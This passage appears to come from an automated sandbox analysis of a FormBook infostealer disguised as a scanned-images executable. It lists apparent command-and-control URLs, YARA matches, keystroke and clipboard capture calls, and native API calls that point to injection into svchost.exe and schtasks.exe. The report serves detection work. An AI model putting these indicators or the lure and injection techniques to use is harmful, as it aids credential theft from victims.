            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 18 Aug 2024 16:26:25 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 18 Aug 2024 16:26:27 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 18 Aug 2024 16:26:30 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: XraVxjqYYo.exe, 0000000A.00000002.3810037675.00000000036E8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://lecoinsa.net/7ffx/?dZo=bNQ0/ONSUiz8Cvet9WekHsY6glAUeAndZ9NU1FoLXha3tv70s5bqu4Q6Bv5eGpaoTDYvbr
            Source: XraVxjqYYo.exe, 0000000A.00000002.3811962670.0000000005491000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lfghtko.lol
            Source: XraVxjqYYo.exe, 0000000A.00000002.3811962670.0000000005491000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lfghtko.lol/yxos/
            Source: schtasks.exe, 00000009.00000003.1808662563.000000000765E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: schtasks.exe, 00000009.00000003.1808662563.000000000765E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: schtasks.exe, 00000009.00000003.1808662563.000000000765E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: schtasks.exe, 00000009.00000003.1808662563.000000000765E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: XraVxjqYYo.exe, 0000000A.00000002.3810037675.0000000003A0C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dhosting.pl
            Source: schtasks.exe, 00000009.00000002.3811492832.0000000003EDC000.00000004.10000000.00040000.00000000.sdmp, XraVxjqYYo.exe, 0000000A.00000002.3810037675.0000000003A0C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dhosting.pl/bledyhttp/domeny.html
            Source: schtasks.exe, 00000009.00000002.3811492832.0000000003EDC000.00000004.10000000.00040000.00000000.sdmp, XraVxjqYYo.exe, 0000000A.00000002.3810037675.0000000003A0C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dhosting.pl/bledyhttp/hosting.html
            Source: schtasks.exe, 00000009.00000002.3811492832.0000000003EDC000.00000004.10000000.00040000.00000000.sdmp, XraVxjqYYo.exe, 0000000A.00000002.3810037675.0000000003A0C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dhosting.pl/img/logo.svg
            Source: XraVxjqYYo.exe, 0000000A.00000002.3810037675.0000000003A0C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dhosting.pl/kontakt
            Source: schtasks.exe, 00000009.00000002.3813151529.0000000005C10000.00000004.00000800.00020000.00000000.sdmp, schtasks.exe, 00000009.00000002.3811492832.00000000046B6000.00000004.10000000.00040000.00000000.sdmp, XraVxjqYYo.exe, 0000000A.00000002.3810037675.00000000041E6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark
            Source: schtasks.exe, 00000009.00000003.1808662563.000000000765E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: schtasks.exe, 00000009.00000003.1808662563.000000000765E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: schtasks.exe, 00000009.00000003.1808662563.000000000765E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: schtasks.exe, 00000009.00000002.3811492832.00000000046B6000.00000004.10000000.00040000.00000000.sdmp, XraVxjqYYo.exe, 0000000A.00000002.3810037675.00000000041E6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js
            Source: schtasks.exe, 00000009.00000002.3813151529.0000000005C10000.00000004.00000800.00020000.00000000.sdmp, schtasks.exe, 00000009.00000002.3811492832.00000000046B6000.00000004.10000000.00040000.00000000.sdmp, XraVxjqYYo.exe, 0000000A.00000002.3810037675.00000000041E6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js
            Source: schtasks.exe, 00000009.00000002.3811492832.00000000046B6000.00000004.10000000.00040000.00000000.sdmp, XraVxjqYYo.exe, 0000000A.00000002.3810037675.00000000041E6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js
            Source: schtasks.exe, 00000009.00000002.3813151529.0000000005C10000.00000004.00000800.00020000.00000000.sdmp, schtasks.exe, 00000009.00000002.3811492832.00000000046B6000.00000004.10000000.00040000.00000000.sdmp, XraVxjqYYo.exe, 0000000A.00000002.3810037675.00000000041E6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?
            Source: schtasks.exe, 00000009.00000002.3813151529.0000000005C10000.00000004.00000800.00020000.00000000.sdmp, schtasks.exe, 00000009.00000002.3811492832.00000000046B6000.00000004.10000000.00040000.00000000.sdmp, XraVxjqYYo.exe, 0000000A.00000002.3810037675.00000000041E6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js
            Source: schtasks.exe, 00000009.00000002.3813151529.0000000005C10000.00000004.00000800.00020000.00000000.sdmp, schtasks.exe, 00000009.00000002.3811492832.00000000046B6000.00000004.10000000.00040000.00000000.sdmp, XraVxjqYYo.exe, 0000000A.00000002.3810037675.00000000041E6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css
            Source: schtasks.exe, 00000009.00000002.3801096520.0000000002901000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: schtasks.exe, 00000009.00000002.3801096520.000000000292C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: schtasks.exe, 00000009.00000003.1804842612.0000000007632000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: schtasks.exe, 00000009.00000002.3801096520.0000000002901000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: schtasks.exe, 00000009.00000002.3801096520.0000000002901000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: schtasks.exe, 00000009.00000002.3801096520.0000000002901000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: schtasks.exe, 00000009.00000002.3801096520.000000000292C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: schtasks.exe, 00000009.00000002.3813151529.0000000005C10000.00000004.00000800.00020000.00000000.sdmp, schtasks.exe, 00000009.00000002.3811492832.00000000046B6000.00000004.10000000.00040000.00000000.sdmp, XraVxjqYYo.exe, 0000000A.00000002.3810037675.00000000041E6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://track.uc.cn/collect
            Source: schtasks.exe, 00000009.00000003.1808662563.000000000765E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: schtasks.exe, 00000009.00000003.1808662563.000000000765E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A9425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00A9425A
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A94458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00A94458
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A9425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00A9425A
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A80219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00A80219
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00AACDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00AACDAC

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.2120000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.2120000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.1624858968.0000000002120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3809994652.0000000002A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1625612818.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3811962670.0000000005410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3809765058.00000000030F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1625179434.0000000002B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3798026711.00000000026B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3809886003.0000000002A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 2.2.svchost.exe.2120000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.2120000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1624858968.0000000002120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.3809994652.0000000002A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1625612818.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000A.00000002.3811962670.0000000005410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.3809765058.00000000030F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1625179434.0000000002B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.3798026711.00000000026B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.3809886003.0000000002A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Binary is likely a compiled AutoIt script file
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: This is a third-party compiled AutoIt script.0_2_00A23B4C
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe, 00000000.00000000.1317050979.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_2b2a3461-1
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe, 00000000.00000000.1317050979.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_73664728-8
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_a5cb8ffd-e
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_868f469c-9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0214B293 NtClose,2_2_0214B293
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72B60 NtClose,LdrInitializeThunk,2_2_02D72B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_02D72DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D735C0 NtCreateMutant,LdrInitializeThunk,2_2_02D735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D74340 NtSetContextThread,2_2_02D74340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D74650 NtSuspendThread,2_2_02D74650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72AD0 NtReadFile,2_2_02D72AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72AF0 NtWriteFile,2_2_02D72AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72AB0 NtWaitForSingleObject,2_2_02D72AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72BF0 NtAllocateVirtualMemory,2_2_02D72BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72BE0 NtQueryValueKey,2_2_02D72BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72B80 NtQueryInformationFile,2_2_02D72B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72BA0 NtEnumerateValueKey,2_2_02D72BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72EE0 NtQueueApcThread,2_2_02D72EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72E80 NtReadVirtualMemory,2_2_02D72E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72EA0 NtAdjustPrivilegesToken,2_2_02D72EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72E30 NtWriteVirtualMemory,2_2_02D72E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72FE0 NtCreateFile,2_2_02D72FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72F90 NtProtectVirtualMemory,2_2_02D72F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72FB0 NtResumeThread,2_2_02D72FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72FA0 NtQuerySection,2_2_02D72FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72F60 NtCreateProcessEx,2_2_02D72F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72F30 NtCreateSection,2_2_02D72F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72CC0 NtQueryVirtualMemory,2_2_02D72CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72CF0 NtOpenProcess,2_2_02D72CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72CA0 NtQueryInformationToken,2_2_02D72CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72C70 NtFreeVirtualMemory,2_2_02D72C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72C60 NtCreateKey,2_2_02D72C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72C00 NtQueryInformationProcess,2_2_02D72C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72DD0 NtDelayExecution,2_2_02D72DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72DB0 NtEnumerateKey,2_2_02D72DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72D10 NtMapViewOfSection,2_2_02D72D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72D00 NtSetInformationFile,2_2_02D72D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72D30 NtUnmapViewOfSection,2_2_02D72D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D73090 NtSetValueKey,2_2_02D73090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D73010 NtOpenDirectoryObject,2_2_02D73010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D739B0 NtGetContextThread,2_2_02D739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D73D70 NtOpenThread,2_2_02D73D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D73D10 NtOpenProcessToken,2_2_02D73D10
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EF4340 NtSetContextThread,LdrInitializeThunk,9_2_02EF4340
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EF4650 NtSuspendThread,LdrInitializeThunk,9_2_02EF4650
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EF2AF0 NtWriteFile,LdrInitializeThunk,9_2_02EF2AF0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EF2AD0 NtReadFile,LdrInitializeThunk,9_2_02EF2AD0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EF2B60 NtClose,LdrInitializeThunk,9_2_02EF2B60
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EF2EE0 NtQueueApcThread,LdrInitializeThunk,9_2_02EF2EE0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EF2FE0 NtCreateFile,LdrInitializeThunk,9_2_02EF2FE0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EF2FB0 NtResumeThread,LdrInitializeThunk,9_2_02EF2FB0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EF2F30 NtCreateSection,LdrInitializeThunk,9_2_02EF2F30
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EF2CA0 NtQueryInformationToken,LdrInitializeThunk,9_2_02EF2CA0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EF2C60 NtCreateKey,LdrInitializeThunk,9_2_02EF2C60
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EF2C70 NtFreeVirtualMemory,LdrInitializeThunk,9_2_02EF2C70
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EF2DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_02EF2DF0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EF2DD0 NtDelayExecution,LdrInitializeThunk,9_2_02EF2DD0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EF2D30 NtUnmapViewOfSection,LdrInitializeThunk,9_2_02EF2D30
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EF2D10 NtMapViewOfSection,LdrInitializeThunk,9_2_02EF2D10
